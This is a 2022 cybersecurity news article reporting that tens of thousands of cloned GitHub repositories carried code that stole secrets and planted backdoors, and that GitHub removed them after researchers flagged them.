By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
Security Parrot - Cyber Security News, Insights and ReviewsSecurity Parrot - Cyber Security News, Insights and Reviews
Notification
Latest News
Twilio was hacked: Credentials stolen from Twilio employees.
August 10, 2022
Chinese hackers attack defense companies and government agencies in Russia and Eastern Europe
August 10, 2022
US authorities imposed sanctions on the cryptocurrency mixer Tornado Cash
August 10, 2022
Microsoft: Windows devices on new CPUs can corrupt data
August 10, 2022
Microsoft will improve the security of Edge when working with less popular sites
August 10, 2022
Aa
  • News
  • Security Insider
  • Tutorials
Reading: Many repositories on GitHub are cloned and distribute malware
Share
Security Parrot - Cyber Security News, Insights and ReviewsSecurity Parrot - Cyber Security News, Insights and Reviews
Aa
Search
  • News
  • Security Insider
  • Tutorials
Follow US
Security Parrot - Cyber Security News, Insights and Reviews > News > Many repositories on GitHub are cloned and distribute malware
News

Many repositories on GitHub are cloned and distribute malware

Last updated: 2022/08/05 at 11:54 PM
Security Parrot Editorial Team Published August 5, 2022
Share
SHARE

Developer Stephen Lacy stirred up the community when he announced on Twitter that he had discovered a “massive malware attack” on GitHub that affected about 35,000 repositories. However, it turned out that it was not about compromise or hacking: the discovered repositories turned out to be forks (copies) of other projects created specifically for the distribution of malware.

Lacey’s original tweet really alarmed the community, as in it the researcher claimed to have found that 35,000 repositories were infected with malware, and the attack affected such well-known projects as crypto, golang, python, js, bash, docker and k8s. Unfortunately, many didn’t read past the first post, and in a subsequent thread, Lacy explained exactly what was going on.

While forking is a common practice and even encouraged among developers, in this case, attackers create copies of other people’s projects and infect them with malicious code in order to attack unsuspecting developers through these malicious clones.

It all started when Lacy was looking into an open source project “found through Google” and noticed the following URL in the code: hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru. As it turns out, a GitHub search turns up this URL in over 35,000 files in a wide variety of repositories.

Bleeping Computer journalists note that this number reflects the number of suspicious files, not infected repositories, so Lacy’s initial estimate was not entirely correct. So, out of 35,788 search results, more than 13,000 results were obtained from one repository – redhat-operator-ecosystem.

After Lacey’s message, many experts began to figure out what exactly he had discovered. For example, James Tucker found that cloned repositories containing a malicious URL extracted user environment variables and were also equipped with a one-line backdoor. Thus, hackers could not only steal important secrets, including API keys, tokens, credentials from Amazon AWS, and cryptographic keys, but also execute arbitrary code on infected systems.

Bleeping Computer journalists write that the vast majority of clone repositories appeared within the last month (from six to twenty days ago), however, some repositories with malicious commits date back to 2015, that is, they were probably hacked.

However, the most recent commits containing the malicious URL already come primarily from defenders, including threat analyst Florian Roth, who created the Sigma rules to detect malicious code. Unfortunately, not everyone has figured out what is going on yet, and some GitHub users have started to falsely complain about the Sigma repository, considering it to be malicious.

Over the past few hours, GitHub has removed almost all malicious clone repositories from its platform, according to Lacey and journalists.

Security Parrot Editorial Team August 5, 2022
Share this Article
Facebook Twitter Email Copy Link Print
What do you think?
Love0
Happy0
Joy0
Surprise0
Embarrass0
Sad0
Cry0
Angry0
Dead0

You Might Also Like

News

Twilio was hacked: Credentials stolen from Twilio employees.

August 10, 2022
News

Chinese hackers attack defense companies and government agencies in Russia and Eastern Europe

August 10, 2022
News

US authorities imposed sanctions on the cryptocurrency mixer Tornado Cash

August 10, 2022
News

Microsoft: Windows devices on new CPUs can corrupt data

August 10, 2022

© 2022 Parrot Media Network. All Rights Reserved.

  • Home
  • About Us
  • Contribute
  • Privacy Policy
  • Terms and Conditions

Removed from reading list

Undo
Go to mobile version
Welcome Back!

Sign in to your account

Lost your password?